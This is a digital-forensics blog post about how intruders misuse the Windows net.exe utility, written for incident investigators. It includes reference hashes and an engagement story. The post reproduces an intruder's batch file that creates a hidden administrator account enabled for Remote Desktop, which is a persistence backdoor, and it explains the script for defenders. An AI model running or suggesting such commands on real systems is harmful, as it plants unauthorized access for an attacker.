Forensic Data Solutions® 

I have come across the executable “net.exe” several times during engagments and heard it referred to as a tool commonly used by nefarious intruders to do bad things in a network. So I decided that it would make a good forensic topic.

For those of us who do not come from an IT background, learning and understand that intruders can and will often use IT administrative tools that are already in the environment they are compromising is important for us to be able to trace their activities within the network. While the Trojan’s and virus’s give the intruder the initial access to the system they will commonly use legitimate command line tools to navigate and traverse the network as well as hiding their activity for as long as possible.

The Net Command is described by Microsoft as: “The Net.exe Utility component is a command-line tool that controls users, groups, services, and network connections.”

http://msdn.microsoft.com/en-us/library/aa939914%28v=winembedded.5%29.aspx

This command is a very powerful tool that intruders like to use for various tasks such as mapping a network or creating and/or modify user accounts once they get administrative access.

The Net command list is quite long and not the focus of this nugget, however, if you looking to mess around with a few of the commands just to see its power and usefulness, here is a couple websites that list the commands and provide examples.

http://www.computerhope.com/nethlp.htm

http://windowsitpro.com/windows/netexe-reference

First let’s talk about where you should see this file on a clean system. In my clean Windows 7 x64 box and these were the 4 locations for this file. Note this is a 64bit OS so there is a 32bit executable in the SysWOW64 directory with the 64 bit in the System32 directory.

The file MD5 hash values are:

64 bit > 63DD6FBAABF881385899FD39DF13DCE3

32 bit> B9A4DAC2192FD78CDA097BFA79F6E7B2

From an engagement perspective, I wanted to share an example of how I have come across this tool in use.

During an engagement where a server was significantly compromised, after finding the creation of a user account in the log analysis, we located a folder that was in the Windows directory off the root that contained a few tools and batch files that were placed there by the intruder.

Note the presence of the services.exe and the net.exe and what is interesting when comparing the hash values of the net.exe files the suspicious one did not match either of the known good files. A Virus Total of the suspicious file showed it was the net1.exe from the Win7 SP1 but had been renamed and moved to this directory by the intruder.

So what is the difference between the net.exe and the net1.exe? According to Tim Fisher at http://pcsupport.about.com/od/commandlinereference/p/net-command.htm the net.exe command had to undergo a modification due to Y2K and the net1 file is the old version that is still used for backward compatibility, but essentially the files serve the same purpose and function.

As a side note, the service.exe file in this directory was flagged in Virus Total as a Trojan and came back as the file below that had been renamed.

So let’s see how the intruder used the net command in this case. The boot.bat file was simply a batch file that contained the following net commands.

@echo off

@net user hover 58911xc, /add

@net localgroup administrators hover /add

@net user hover /active:yes

@net user hover 58911xc,

@net localgroup "Remote Desktop Users" hover /add

@exit

This was a simple command that first turns off the echo for a little more stealth and then creates the user account “hover”. Then the next line adds the account to the administrators group before activating it in the next line. Then it adds the account to the remote Desktop User groups to allow it to be logged into remotely.

In one simple swoop this intruder used the net command to give him backdoor remote access that allowed for him/her to return that their convenience.

From a network mapping perspective if an intruder can gain access to a command prompt in the environment they can run a simple command that will list out all the systems on the network, giving the intruder a pretty good idea where to look next.